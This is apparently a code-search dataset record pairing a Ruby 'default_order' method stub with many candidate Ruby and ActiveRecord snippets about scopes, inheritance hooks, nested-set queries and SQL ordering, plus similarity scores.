"def method_missing(name, *args)\n if scopes[name].nil?\n super\n else\n execute_scope(name, *args)\n end\n end",
"def inherited(subclass)\n super\n\n ds = dataset\n\n subclass.period_start_date_column = period_start_date_column\n subclass.period_end_date_column = period_end_date_column\n subclass.instance_eval do\n set_dataset(ds)\n end\n end",
"def children\n base_set_class.find(:all, :conditions => \"#{scope_condition} AND #{parent_col_name} = #{self.id}\", :order => left_col_name)\n end",
"def self_and_ancestors\n base_class.all scoped(left_column_name => { '$lte' => left }, right_column_name => { '$gte' => right })\n end",
"def filter\n \n ## Make sure this object quacks like the suitable variety of duck\n self.class::REQUIRED_QUACKS.each do |method|\n \n return nil unless self.respond_to? method\n return nil unless self.send(method)\n \n end\n \n return self\n \n end",
"def inherited(_sub)\n raise Error, \"cannot subclass #{self}\" unless self == Object\n end",
"def included(base)\n super(base)\n base.extend(ClassMethods)\n base.extend(ClassScope)\n end",
"def primary_where_clause\n raise StandardError, 'To use #totalise_query, you must implement #primary_where_clause'\n end",
"def initialize(base, &filter)\n @base = base\n @filter = filter\n end",
"def inherited( subclass )\n\t\t\tsuper\n\t\t\tsubclass.instance_variable_set( :@paramvalidator, self.paramvalidator.dup )\n\t\t\tself.log.debug \"Adding param validator: %p\" % [ self.paramvalidator ]\n\t\tend",
"def to_query(_model)\n raise 'subclasses should implement this method.'\n end",
"def self_and_descendants\n base_class.all scoped(left_column_name => { '$gte' => left }, right_column_name => { '$lte' => right })\n end",
"def self_and_ancestors\n base_set_class.find(:all, :conditions => \"#{scope_condition} AND (#{self[left_col_name]} BETWEEN #{left_col_name} AND #{right_col_name})\", :order => left_col_name )\n end",
"def inherited( subclass )\n\t\t\tsuper\n\t\t\tStrelka::App::Auth.extended_apps << subclass\n\t\t\tsubclass.instance_variable_set( :@auth_provider, @auth_provider )\n\t\t\tsubclass.instance_variable_set( :@positive_auth_criteria, @positive_auth_criteria.dup )\n\t\t\tsubclass.instance_variable_set( :@negative_auth_criteria, @negative_auth_criteria.dup )\n\t\t\tsubclass.instance_variable_set( :@positive_perms_criteria, @positive_perms_criteria.dup )\n\t\t\tsubclass.instance_variable_set( :@negative_perms_criteria, @negative_perms_criteria.dup )\n\t\tend",
"def super_method; end",
"def filters\n filters_class&.new(self.scoped)\n end",
"def eval_rql(alias_derived_attr = false, &block)\n Dsl::Base.new(self.unscoped, alias_derived_attr).instance_eval(&block)\n end",
"def set_search_scope(opts)\n opts = check_params(opts,[:search_scopes])\n super(opts)\n end",
"def descendants\n model_base_class.where(descendant_conditions)\n end",
"def apply_scopes(*)\n relation = super\n relation = relation.accessible_by(current_ability) if scope_accessible?\n relation\n end",
"def self_and_siblings\n base_class.all scoped(parent_column_name => _parent_id)\n end",
"def execute(*)\n super\n end",
"def inherited(subclass)\n subclass.instance_variable_set(\"@fields\", fields.dup)\n subclass.instance_variable_set(\"@relations\", relations.dup)\n end",
"def criteria(base, id_list = nil)\n query_criteria(id_list || base.send(foreign_key))\n end",
"def inherited(subclass)\n super\n subclass.acts_as_cacheable_cache = acts_as_cacheable_cache\n subclass.acts_as_cacheable_time_to_live = acts_as_cacheable_time_to_live\n subclass.acts_as_cacheable_logger = acts_as_cacheable_logger\n end",
"def exec\n super\n end",
"def ratings_query\n super\n end",
"def filter_prepare(current_filter = @filter, subfilter = @subfilter)\n verified_filter = @filters.assoc(current_filter) ? current_filter : @filters.first[0]\n subfilter ||= {}\n the_filter = @filters.assoc(verified_filter)[1]\n # I had to do this in this kind of funny way to avoid actually modifying @filters.\n find_conditions = the_filter.has_key?(:conditions) ? the_filter[:conditions].dup : ['1']\n find_include = []\n # find_conditions += filter[:conditions] if filter.has_key?(:conditions)\n find_include += the_filter[:include] if the_filter.has_key?(:include)\n # If no subfilters have been checked, this should be skipped, accept all\n # If some subfilters have been checked, only the checked ones will be traversed.\n # Within a single key, two checks yields OR\n # Across keys, two checks yield AND\n # The idea is that the subfilter conditions will read \"field in (?)\"\n # And then the keys will provide the array of options\n subfilter.each do |key, sf|\n fsf = the_filter[:subfilters].assoc(key)[1].dup\n find_conditions[0] += (' and ' + fsf[:conditions])\n find_conditions << sf.keys\n find_include << fsf[:include] if fsf.has_key?(:include)\n end\n total_records = scoped_model.count(:all, :include => find_include, :conditions => find_conditions)\n # puts \"%%%%% FILTER INFO IN FILTER_PREPARE: include:[#{find_include.inspect}], conditions:[#{find_conditions.inspect}].\"\n return[verified_filter, subfilter, find_include, find_conditions, total_records]\n end",
"def inherited(subclass)\n # Copy properties from parent to subclass\n resource_class.properties.each do |_name, config|\n subclass.property config.term, predicate: config.predicate, class_name: config.class_name\n end\n\n subclass.configure_model\n end",
"def inherited(base)\n subclasses << base\n super(base)\n end",
"def altered()\n puts \"CHILD, BEFORE PARENT altered()\" # change to altered() before calling the base class instance method with same name\n super() # base method with name name is call here\n puts \"CHILD, AFTER PARENT altered()\" # change to altered() after calling the base class instance method with same name\n end",
"def inherited( subclass )\n\t\tsuper\n\t\tStrelka::Discovery.log.info \"%p inherited by discoverable class %p\" % [ self, subclass ]\n\t\tStrelka::Discovery.add_inherited_class( subclass )\n\tend",
"def initialize\n super(\"query\")\n end",
"def inherited(subclass)\n super\n subclass.instance_variable_set(:@comparison_attrs, comparison_attrs.dup)\n end",
"def inherited(subclass)\n super\n subclass.rules.update self.rules\n end",
"def prepare_sub_query(base, settings)\n @union_all = settings.union_all if @union_all.nil?\n @sub_query ||= settings.sub_query\n @depth ||= settings.depth\n @path ||= settings.path\n\n # Collect the connection\n @connect ||= settings.connect || begin\n key = base.primary_key\n [key.to_sym, :\"parent_#{key}\"] unless key.nil?\n end\n\n raise ArgumentError, <<-MSG.squish if @sub_query.nil? && @query.is_a?(String)\n Unable to generate sub query from a string query. Please provide a `sub_query`\n property on the \"#{table_name}\" settings.\n MSG\n\n if @sub_query.nil?\n raise ArgumentError, <<-MSG.squish if @connect.blank?\n Unable to generate sub query without setting up a proper way to connect it\n with the main query. Please provide a `connect` property on the \"#{table_name}\"\n settings.\n MSG\n\n left, right = @connect.map(&:to_s)\n condition = @query.arel_table[right].eq(table[left])\n\n if @query.where_values_hash.key?(right)\n @sub_query = @query.unscope(where: right.to_sym).where(condition)\n else\n @sub_query = @query.where(condition)\n @query = @query.where(right => nil)\n end\n elsif @sub_query.respond_to?(:call)\n # Call a proc to get the real sub query\n call_args = @sub_query.try(:arity) === 0 ? [] : [OpenStruct.new(@args)]\n @sub_query = @sub_query.call(*call_args)\n end\n end",
"def define_scope_method(name)\n singleton_class.class_eval do\n ruby2_keywords(\n define_method(name) do |*args|\n scoping = _declared_scopes[name]\n scope = instance_exec(*args, &scoping[:scope])\n extension = scoping[:extension]\n to_merge = scope || queryable\n criteria = to_merge.empty_and_chainable? ? to_merge : with_default_scope.merge(to_merge)\n criteria.extend(extension)\n criteria\n end\n )\n end\n end",
"def sync_filters\n super.presence || default_sync_filters\n end",
"def initialize(&block)\n @filter = (block || method(:filter))\n super()\n end",
"def set_filter(opts)\n opts = check_params(opts,[:filters])\n super(opts)\n end",
"def sub_query(value = nil, command = nil)\n return unless recursive?\n return @sub_query if value.nil?\n\n @sub_query = sanitize_query(value, command)\n end",
"def subquery\n subqueries.\n compact.\n inject(&:merge)\n end",
"def inherited( subclass )\n\t\t\tsuper\n\n\t\t\tverbs_copy = Strelka::DataUtilities.deep_copy( self.resource_verbs )\n\t\t\tsubclass.instance_variable_set( :@resource_verbs, verbs_copy )\n\n\t\t\topts_copy = Strelka::DataUtilities.deep_copy( self.service_options )\n\t\t\tsubclass.instance_variable_set( :@service_options, opts_copy )\n\t\tend",
"def inherited(klass); end",
"def inherited(klass); end",
"def inherited(base)\n Base.inherited(base)\n end",
"def initialize(ancestors, options = {})\n @ancestors = ancestors\n filter(options)\n end",
"def base_scope\n ApplicationRecord.none\n end",
"def before_all\n super if defined?(super)\n end",
"def inherited(subclass)\n Event.all << subclass\n end",
"def extend_inherited_method\n ActiveRecord::Base.class_eval do\n class << self\n def inherited_with_valle_validators(subclass)\n inherited_without_valle_validators(subclass)\n if Valle::Hooks.can_add_validators?(subclass, self)\n Valle::Hooks.add_validators(subclass)\n end\n end\n alias_method_chain :inherited, :valle_validators\n end\n end\n end",
"def search( scope=:subtree, filter='(objectClass=*)', parameters={}, &block )\n\t\tparameters[:selectattrs] |= ['objectClass'] unless\n\t\t\t!parameters.key?( :selectattrs ) || parameters[ :selectattrs ].empty?\n\n\t\tsuper\n\tend",
"def inherited(subclass)\n super\n ivs = subclass.instance_variables\n inherited_instance_variables.each do |iv, dup|\n next if ivs.include?(iv)\n if (sup_class_value = instance_variable_get(iv)) && dup\n sup_class_value = case dup\n when :dup\n sup_class_value.dup\n when :hash_dup\n h = {}\n sup_class_value.each{|k,v| h[k] = v.dup}\n h\n when Proc\n dup.call(sup_class_value)\n else\n raise Error, \"bad inherited instance variable type: #{dup.inspect}\"\n end\n end\n subclass.instance_variable_set(iv, sup_class_value)\n end\n\n unless ivs.include?(\"@dataset\")\n if @dataset && self != Model\n subclass.set_dataset(@dataset.clone, :inherited=>true)\n elsif (n = subclass.name) && !n.to_s.empty?\n db\n subclass.set_dataset(subclass.implicit_table_name)\n end\n end\n end",
"def subtree\n model_base_class.scoped(:conditions => subtree_conditions)\n end",
"def query_scope\n record_class.public_send(include_strategy, included_associations)\n end",
"def build_collection_scope_base(some_instance)\n some_instance.send(@collection_name).scoped\n end",
"def foo(...)\n super(...)\nend",
"def inherited(subclass)\n super\n ivs = subclass.instance_variables.map(&:to_s)\n inherited_instance_variables.each do |iv, dup|\n next if ivs.include?(iv.to_s)\n if (sup_class_value = instance_variable_get(iv)) && dup\n sup_class_value = case dup\n when :dup\n sup_class_value.dup\n when :hash_dup\n h = {}\n sup_class_value.each{|k,v| h[k] = v.dup}\n h\n when Proc\n dup.call(sup_class_value)\n else\n raise Error, \"bad inherited instance variable type: #{dup.inspect}\"\n end\n end\n subclass.instance_variable_set(iv, sup_class_value)\n end\n\n unless ivs.include?(\"@dataset\")\n if @dataset && self != Model\n subclass.set_dataset(@dataset.clone, :inherited=>true)\n elsif (n = subclass.name) && !n.to_s.empty?\n db\n subclass.set_dataset(subclass.implicit_table_name)\n end\n end\n end",
"def self_and_descendants\n # using _left_ for both sides here lets us benefit from an index on that column if one exists\n nested_set_scope.where(\n arel_table[primary_column_name].eq(self.primary_id).or(arel_table[total_order_column_name].gteq(total_order)).\n and(arel_table[total_order_column_name].lt(snumv/denv)))\n end",
"def initialize\n\t super # need to do this so other parts of AR's initialize method run first\n\t self = self.where(type: \"School\") # does this work? 'type' used to be a reserved word in earlier Rails\n\t # or \n\t # self = self.select{ |data| data.type == \"school\" }\n end",
"def custom_queries\n @custom_queries ||= ::Valkyrie::Persistence::CustomQueryContainer.new(query_service: self)\n end",
"def special\n override\n end",
"def full_set(special=nil)\n if special && special[:exclude]\n exclude_str = \" AND NOT (#{base_set_class.sql_for(special[:exclude])}) \"\n elsif new_record? || self[right_col_name] - self[left_col_name] == 1\n return [self]\n end\n base_set_class.find(:all, :conditions => \"#{scope_condition} #{exclude_str} AND (#{left_col_name} BETWEEN #{self[left_col_name]} AND #{self[right_col_name]})\", :order => left_col_name)\n end",
"def initialize(parent, new_query = {}, name = nil)\n if parent.is_a? Base\n raise \"Name must be provided for view to be initialized\" if name.nil?\n @name = name\n @database = parent.database\n @query = { :reduce => false }\n elsif parent.is_a? View\n @database = parent.database\n @query = parent.query.dup\n else\n raise \"View cannot be initialized without a parent Model or View\"\n end\n @query.update(new_query)\n super\n end",
"def self_and_ancestors\n nested_set_scope.where(\"#{self.class.table_name}.lft <= ? AND #{self.class.table_name}.rgt >= ?\", lft, rgt)\n end",
"def inherited(subclass)\n super\n subclass.instance_variable_set(:@gauges, @gauges)\n end",
"def execute\n super()\n end",
"def default_filter(iter)\n iter.parent[0] < 0 ? \" #{@where_fields}=#{iter.parent.parent[0]} \" :\n \" #{@where_fields}=#{iter.parent[0]} \"\n\n end",
"def altered()\n puts \"CHILD, BEFORE PARENT altered()\" \n super() # calls the super function so the program will use the function defined in the parent class\n puts \"CHILD, AFTER PARENT altered()\"\n end"
] |
[
"0.67301923",
"0.65505743",
"0.63372445",
"0.63266003",
"0.59769773",
"0.5874502",
"0.5688907",
"0.56794375",
"0.5635255",
"0.5566433",
"0.5540747",
"0.5530601",
"0.5455237",
"0.5409443",
"0.5393406",
"0.5370838",
"0.536498",
"0.53544056",
"0.535165",
"0.53295875",
"0.5307537",
"0.5285948",
"0.5261138",
"0.5234533",
"0.5228194",
"0.5165459",
"0.5160044",
"0.5150416",
"0.5139393",
"0.5138619",
"0.5134832",
"0.51218575",
"0.51093405",
"0.5099999",
"0.50753385",
"0.50747037",
"0.50730556",
"0.5059311",
"0.5058358",
"0.50566304",
"0.50520396",
"0.50501555",
"0.5040771",
"0.5020508",
"0.5006889",
"0.49840185",
"0.49836498",
"0.49828824",
"0.49761975",
"0.49621665",
"0.49535248",
"0.49522617",
"0.49459475",
"0.49399707",
"0.4930799",
"0.49275798",
"0.49224553",
"0.49092892",
"0.49088544",
"0.49083707",
"0.49063468",
"0.49034575",
"0.49011853",
"0.48913997",
"0.48802063",
"0.4877537",
"0.48720443",
"0.48703662",
"0.48697153",
"0.486772",
"0.4863037",
"0.48499998",
"0.48392364",
"0.48324865",
"0.48200855",
"0.48200855",
"0.48049274",
"0.47906083",
"0.47905287",
"0.47874704",
"0.47825593",
"0.47760963",
"0.47758815",
"0.47749603",
"0.47679138",
"0.47669777",
"0.47663346",
"0.47603792",
"0.47549286",
"0.4748166",
"0.4743242",
"0.47411337",
"0.47395104",
"0.4738123",
"0.47320765",
"0.4730863",
"0.4722367",
"0.47153804",
"0.47138622",
"0.47095743"
] |
0.5228065
|
25
|
Required method on child class. Specify here default SQL ORDER BY for all results e.g. "strategy_data>>'bill_acted_on' DESC"
|
def default_order
raise NotImplementedError
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def ordering_query; end",
"def order_clause\n col = case sort_params[:sort_col]\n when 'title'\n 'data_management_plans.title'\n when 'funder'\n 'affiliations_fundings.name'\n else\n 'data_management_plans.updated_at'\n end\n { \"#{col}\": :\"#{sort_params[:sort_dir]}\" }\n end",
"def get_order_by\n @order_by\n end",
"def ordering_sql_string\n\t\tif order\n\t\t\torder.collect{|col,dir| absolute_column_name( col ) + ((dir.eql?(:asc))?(''):(' DESC')) if item_class.column_names.include?( col ) }.compact.join(',')\n\t\tend\n\tend",
"def ordering_query\n \"#{sql_length}(#{slug_column}) ASC, #{slug_column} ASC\"\n end",
"def order_by=( val )\n @order_by = val.blank? ? \"#{table_name}.created_at DESC\" : val\n end",
"def typus_order_by\n\n order = []\n\n begin\n fields = self.send(\"admin_order_by\").map { |a| a.to_s }\n rescue\n config = Typus::Configuration.config[self.name]\n return \"`#{self.table_name}`.id ASC\" unless config && config['order_by']\n fields = config['order_by'].split(', ')\n end\n\n fields.each do |field|\n order_by = (field.include?(\"-\")) ? \"`#{self.table_name}`.#{field.delete('-')} DESC\" : \"`#{self.table_name}`.#{field} ASC\"\n order << order_by\n end\n\n return order.join(', ')\n\n end",
"def orders\n \"assetcode ASC\"# \"staffgrade_id ASC\"\n end",
"def column_order_by\n @@column_order_by\n end",
"def to_cql\n \"ORDER BY #{@field} #{@dir.to_s.upcase}\"\n end",
"def order_by(*props)\n @query[:order_by] = props.join(',')\n self\n end",
"def summary_order_by(params, options)\n case params[:order_by].to_s\n when \"orig_name\" then\n order_by = \"u.first_name\"\n when \"orig_calls\" then\n order_by = \"total_calls\"\n when \"orig_exec_billsec\" then\n order_by = \"exact_billsec\"\n when \"orig_billsec\" then\n order_by = \"originator_billsec\"\n when \"orig_price\" then\n order_by = \"originator_price\"\n\n when \"term_name\" then\n order_by = \"provider_name\"\n when \"term_calls\" then\n order_by = \"total_calls\"\n when \"term_exec_billsec\" then\n order_by = \"exact_billsec\"\n when \"term_billsec\" then\n order_by = \"provider_billsec\"\n when \"term_price\" then\n order_by = \"provider_price\"\n else\n options[:order_by] ? order_by = options[:order_by] : order_by = \"\"\n end\n without = order_by\n\n order_by = \"users.first_name \" + (options[:order_desc] == 1 ? \"DESC\" : \"ASC\") + \", users.last_name\" if order_by.to_s == \"users.first_name\"\n\n order_by += \" ASC\" if options[:order_desc] == 0 and order_by != \"\"\n order_by += \" DESC\" if options[:order_desc] == 1 and order_by != \"\"\n return without, order_by\n end",
"def sort_clause\n sorter.to_sql\n end",
"def apply_sorting(relation)\n relation.order(@q.sorting.to_sql)\n end",
"def arel_order\n text_columns = if params[:order]\n params[:order].split(' ')\n elsif self.default_sort\n [self.default_sort].flatten\n else\n [model_class.primary_key].flatten\n end\n sort_columns = text_columns.map do |column|\n if column.to_s.include?('.')\n name,direction = column.to_s.split('.',2)\n raise \"Illegal sort direction: #{direction} in #{column}\" unless %w{asc desc}.include?(direction)\n table[name].send(direction)\n else\n table[column]\n end\n end\n sort_columns\n end",
"def order(order_str:)\n @order_by = \"ORDER BY #{order_str}\"\n end",
"def order_by(ids, klass=nil)\n column = namespaced_column(:id, klass)\n if ids.empty?\n nil\n elsif ::ActiveRecord::Base.is_mysql_adapter?\n \"FIELD(#{column},#{ids.join(',')})\"\n else\n order = ''\n ids.each_index { |i| order << \"WHEN #{column}=#{ids[i]} THEN #{i+1} \" }\n \"CASE \" + order + \" END\"\n end\n end",
"def ordering_by\n order && order.to_s.gsub(/^(ascend|descend)_by_/, '')\n end",
"def agregate_order_by(params, options)\n case params[:order_by].to_s\n when \"direction\" then\n order_by = \"destinations.direction_code\"\n when \"destination\" then\n order_by = \"destinations.name\"\n when \"customer_orig\" then\n order_by = \"nice_user\"\n when \"customer_term\" then\n order_by = \"terminators.name\"\n when \"billed_orig\" then\n order_by = \"originating_billed\"\n when \"billed_term\" then\n order_by = \"terminating_billed\"\n when \"billsec_orig\" then\n order_by = \"originating_billsec\"\n when \"billsec_term\" then\n order_by = \"terminating_billsec\"\n when \"duration\" then\n order_by = \"duration\"\n when \"answered_calls\" then\n order_by = \"answered_calls\"\n when \"total_calls\" then\n order_by = \"total_calls\"\n when \"asr\" then\n order_by = \"asr\"\n when \"acd\" then\n order_by = \"acd\"\n else\n options[:order_by] ? order_by = options[:order_by] : order_by = \"\"\n end\n\n without = order_by\n order_by = \"users.first_name \" + (options[:order_desc] == 1 ? \"DESC\" : \"ASC\") + \", users.last_name\" if order_by.to_s == \"users.first_name\"\n order_by = \"ds.direction_code \" + (options[:order_desc] == 1 ? \"DESC\" : \"ASC\") + \", ds.name\" if order_by.to_s == \"destinations.name\"\n order_by = \"ds.direction_code \" + (options[:order_desc] == 1 ? \"DESC\" : \"ASC\") + \", ds.subcode\" if order_by.to_s == \"destinations.name\"\n order_by = \"t.name\" if order_by.to_s == \"terminators.name\"\n\n order_by += \" ASC\" if options[:order_desc] == 0 and order_by != \"\"\n order_by += \" DESC\" if options[:order_desc] == 1 and order_by != \"\"\n return without, order_by\n end",
"def sort_order\n super\n end",
"def sorted\n all.order(Arel.sql(%[ #{quoted_table_name}.\"recorded_at\" ASC, #{quoted_table_name}.\"hid\" ASC ]))\n end",
"def asc\n from(default_table).asc\n end",
"def orders\n \"staffgrade_id ASC\"\n end",
"def orders\n \"staffgrade_id ASC\"\n end",
"def sorting\n sort_no = 0\n sorts = []\n\n loop do\n sorted = false\n name_col = \"iSortCol_#{sort_no}\"\n name_mode = \"sSortDir_#{sort_no}\"\n sort_col = @dts[name_col]\n break if !sort_col\n\n col_name = @columns[sort_col.to_i]\n next if !col_name\n\n if @dts[name_mode] == \"desc\"\n sort_mode = \"DESC\"\n else\n sort_mode = \"ASC\"\n end\n\n if match = col_name.to_s.match(/^(.+)_id$/)\n method_name = match[1]\n sub_model_name = StringCases.snake_to_camel(col_name.slice(0, col_name.length - 3))\n\n if Kernel.const_defined?(sub_model_name)\n sub_model_const = Kernel.const_get(sub_model_name)\n unless @joins.key?(method_name)\n @query = @query.includes(method_name)\n @joins[method_name] = true\n end\n\n @sort_columns.each do |sort_col_name|\n if sub_model_const.column_names.include?(sort_col_name.to_s)\n sorts << \"`#{sub_model_const.table_name}`.`#{escape_col(sort_col_name)}` #{sort_mode}\"\n sorted = true\n break\n end\n end\n end\n end\n\n if @model.column_names.include?(col_name.to_s)\n sorts << \"`#{@model.table_name}`.`#{escape_col(col_name)}` #{sort_mode}\"\n elsif @args[:sort]\n res = @args[:sort].call(:key => col_name, :sort_mode => sort_mode, :query => @query)\n @query = res if res\n else\n raise \"Unknown sort-column: '#{col_name}'.\"\n end\n\n sort_no += 1\n end\n\n @query = @query.order(sorts.join(\", \"))\n end",
"def default_sort\n if results_limit\n order(MasterRank).limit(results_limit)\n else\n order(MasterRank).all\n end\n end",
"def ordered_by(statement)\n @expected_options[:order] = statement\n self\n end",
"def column_to_order_by(column)\n @@column_order_by = column || \"updated_at\"\n\n define_method(:column_order_by) do\n @@column_order_by\n end\n end",
"def add_order_by_for_association_limiting!(sql, options)\n return sql if options[:order].blank?\n\n order = options[:order].split(',').collect { |s| s.strip }.reject(&:blank?)\n order.map! {|s| $1 if s =~ / (.*)/}\n order = order.zip((0...order.size).to_a).map { |s,i| \"alias_#{i}__ #{s}\" }.join(', ')\n\n sql << \" ORDER BY #{order}\"\n end",
"def getSortingOrder #:doc:\n sorting = @default_sorting.dup\n ordering = [\"DESC\", \"ASC\", \"ASC\", \"ASC\"] # default ordering\n \n if @queryparams[:sort_by]\n # get given sort_by-values\n sorts = @queryparams[:sort_by].split(\" \")\n # get given order-values and make sure sorts.size == orders.size\n orders = Array.new(sorts.size, \"DESC\")\n if @queryparams[:order]\n orders = @queryparams[:order].split(\" \")\n if orders.size < sorts.size\n orders += Array.new(sorts.size - orders.size, \"DESC\")\n elsif orders.size > sorts.size\n orders = orders.slice(0, sorts.size)\n end\n orders.each do |o|\n if not (o.upcase == \"ASC\" or o.upcase == \"DESC\") then o = \"ASC\" end\n end \n end\n \n # first sort_by-value has to be processed last (so it gets first on the list)\n sorts = sorts.reverse\n orders = orders.reverse\n \n # check sort_by-values\n sorts.each_index do |i|\n if @sort_by.has_key?(sorts[i])\n # move the sort-attribute to first\n sort_value = @sort_by[sorts[i]]\n ind = sorting.index(\"LOWER(\" + @sort_by[sorts[i]] + \")\")\n if ind != nil\n sorting.delete_at(ind)\n ordering.delete_at(ind)\n sort_value = \"LOWER(\" + sort_value + \")\"\n end\n sorting.unshift(sort_value)\n ordering.unshift(orders[i].upcase)\n end\n end\n end\n \n #combine everything together\n returnable = sorting[0] + \" \" + ordering[0]\n sorting.each_index do |i|\n next if i == 0\n returnable += \", \" + sorting[i] + \" \" + ordering[i]\n end\n return returnable\n end",
"def order_by\n ActiveSupport::StringInquirer.new(@params[:order_by]) unless @params[:order_by].nil?\n end",
"def company_order\n {updated_at: :desc}\n end",
"def order_by(property_name)\n query_proxy = OData::Model::QueryProxy.new(self)\n query_proxy.order_by(property_name.to_sym)\n end",
"def order_by\n if params[:order_by]\n if params[:order_by] == 'created_at'\n # If created at, get newest first\n params[:order_by] + ' DESC'\n else\n # Otherwise, get closest to now\n params[:order_by] + ' ASC'\n end\n else\n # Default to start date, ascending\n 'starts_at ASC'\n end\n end",
"def set_order\n unless params[:order_by]\n @order = @model.typus_order_by\n else\n @order = \"#{params[:order_by]} #{params[:sort_order]}\"\n end\n end",
"def order_by_field\n self.find_field(self.order_by)\n end",
"def default_ordering(field_name)\n case field_name\n when \"status\"; return(\"ascending\")\n when \"from\"; return(\"ascending\")\n when \"subject\"; return(\"ascending\")\n when \"date\"; return(\"descending\")\n end \n end",
"def sort_column\n super \"Room\", \"sort_order\"\n end",
"def sort_column\n super \"Room\", \"sort_order\"\n end",
"def responses_order\n if custom_view? && params[:order_column].blank?\n custom_view.sorted_display_field_custom_views.inject({}) do |hash, s|\n hash.merge elastic_sort(\"df_#{s.display_field_id}.raw\", s.sort_direction)\n end\n else # fall back on date if we have no other recourse\n elastic_sort(order_column, order_dir)\n end\n end",
"def ordered_expression_sql(oe)\n \"#{literal(oe.expression)} #{oe.descending ? 'DESC' : 'ASC'}\"\n end",
"def sort\n @sort ||= if order_by_primary_key?\n # Default order is by id DESC\n :desc\n else\n # API defaults to DESC order if param `sort` not present\n request_context.params[:sort]&.to_sym || :desc\n end\n end",
"def default_sort\n { order: :created_at, direction: :desc }\n end",
"def apply_search_order( ds, options )\n\t\tif (( fields = options[:order] ))\n\t\t\tds = ds.to_a.sort_by do |uuid|\n\t\t\t\t@storage[ uuid ].values_at( *fields.compact ).map {|val| val || ''}\n\t\t\tend\n\t\tend\n\n\t\treturn ds\n\tend",
"def default_sort_order\n ::Mincer.config.sorting.order_attribute\n end",
"def add_order_by_for_association_limiting!(sql, options)\n return sql if options[:order].blank?\n\n order = options[:order].split(',').collect { |s| s.strip }.reject(&:blank?)\n order.map! { |s| 'DESC' if s =~ /\\bdesc$/i }\n order = order.zip((0...order.size).to_a).map { |s,i| \"id_list.alias_#{i} #{s}\" }.join(', ')\n\n sql.replace \"SELECT * FROM (#{sql}) AS id_list ORDER BY #{order}\"\n end",
"def add_order_by_for_association_limiting!(sql, options)\n return sql if options[:order].blank?\n\n order = options[:order].split(',').collect { |s| s.strip }.reject(&:blank?)\n order.map! { |s| 'DESC' if s =~ /\\bdesc$/i }\n order = order.zip((0...order.size).to_a).map { |s,i| \"id_list.alias_#{i} #{s}\" }.join(', ')\n\n sql.replace \"SELECT * FROM (#{sql}) AS id_list ORDER BY #{order}\"\n end",
"def add_order_by_for_association_limiting!(sql, options)\n return sql if options[:order].blank?\n\n order = options[:order].split(',').collect { |s| s.strip }.reject(&:blank?)\n order.map! { |s| 'DESC' if s =~ /\\bdesc$/i }\n order = order.zip((0...order.size).to_a).map { |s,i| \"id_list.alias_#{i} #{s}\" }.join(', ')\n\n sql.replace \"SELECT * FROM (#{sql}) AS id_list ORDER BY #{order}\"\n end",
"def sorted\n all.order(%[ #{quoted_table_name}.\"recorded_at\", #{quoted_table_name}.\"hid\" ])\n end",
"def order_by *columns\n @order += [columns].flatten\n end",
"def order(*args)\n sql_records = records.__send__ :order, *args\n end",
"def index_sort_order\n @query = {}\n @query['sort_key'] = params['sort_key'] unless params['sort_key'].blank?\n\n if @query['sort_key']&.starts_with?('-')\n \"#{@query['sort_key'].delete_prefix('-')} DESC\"\n elsif @query['sort_key'].present?\n \"#{@query['sort_key']} ASC\"\n else\n 'updated_at DESC'\n end\n end",
"def order; end",
"def order; end",
"def set_conditions_and_sort_order(query, sdb_type)\n conditions = [\"simpledb_type = '#{sdb_type}'\"]\n # look for query.order.first and insure in conditions\n # raise if order if greater than 1\n\n if query.order && query.order.length > 0\n query_object = query.order[0]\n #anything sorted on must be a condition for SDB\n conditions << \"#{query_object.property.name} IS NOT NULL\" \n order = \"order by #{query_object.property.name} #{query_object.direction}\"\n else\n order = \"\"\n end\n\n query.conditions.each do |operator, attribute, value|\n operator = case operator\n when :eql then '='\n when :not then '!='\n when :gt then '>'\n when :gte then '>='\n when :lt then '<'\n when :lte then '<='\n else raise \"Invalid query operator: #{operator.inspect}\" \n end\n conditions << \"#{attribute.name} #{operator} '#{value}'\"\n end\n [conditions,order]\n end",
"def sort_order\n sortable_column_order do |column, direction|\n if resource_handler.model_associations.present? && column.match(/\\./)\n table, column = column.split('.')\n if resource_handler.model_associations.detect { |a| a.table_name == table }\n \"#{table}.#{column} #{direction}\"\n else\n fallback_sort_order(direction)\n end\n elsif resource_handler.model.column_names.include?(column.to_s)\n \"#{resource_handler.model.table_name}.#{column} #{direction}\"\n else\n fallback_sort_order(direction)\n end\n end\n end",
"def order_by(column, order)\n return resource().order(column.to_s + \" \" + order)\n end",
"def default_sort\n 'name asc'\n end",
"def default_sort\n 'created_at desc'\n end",
"def selects_all_bears_names_and_orders_in_alphabetical_order\n 'SELECT bears.name FROM bears ORDER BY name'\nend",
"def order_by(order_by)\n @order_bys << CGI.escape(order_by)\n self\n end",
"def order_by( &block )\n @order_by = block\n order\n self\n end",
"def sort_sql_helper(param)\n return param.gsub('_reverse',\" DESC\")\n end",
"def order_by(attribute)\n @order_by = Dynamicloud::API::Criteria::OrderByClause.asc(attribute)\n self\n end",
"def ordered_by(attribute_name)\n ordering[attribute_name]\n end",
"def apply_sort(query, table, column_name, allowed, direction)\n validate_query_table_column(query, table, column_name, allowed)\n validate_sorting(column_name, allowed, direction)\n\n # allow sorting by field mappings\n sort_field = @build.build_custom_calculated_field(column_name)&.fetch(:arel)\n sort_field = table[column_name] if sort_field.blank?\n\n if sort_field.is_a? String\n sort_field\n elsif direction == :desc\n Arel::Nodes::Descending.new(sort_field)\n else\n #direction == :asc\n Arel::Nodes::Ascending.new(sort_field)\n end => sort_field_by\n\n query.order(sort_field_by)\n end",
"def to_find_order\n if @order.blank?\n nil\n else\n @order.collect do |col|\n col.respond_to?(:full_name) ? (col.full_name + (col.negative? ? \" DESC\" : \"\")) : col\n end.join(\", \")\n end\n end",
"def sort_and_order_sql\n {:sort => ATTACH_MAPPING[@sort], :order => @order}\n end",
"def ordered(data)\n field, ordering = sanitize_ordering(data, field_suffix: :AT)\n\n dtf = params.dig(:query, :filter, :date_time_filter) || {}\n if (dtf.keys - [field]).any?\n raise SquareLite::MismatchedParams.new(sort_field: data, date_time_filter: dtf)\n end\n\n params.bury(:query, :sort, sort_field: field, sort_order: ordering)\n self\n end",
"def add_sort_field(*) super end",
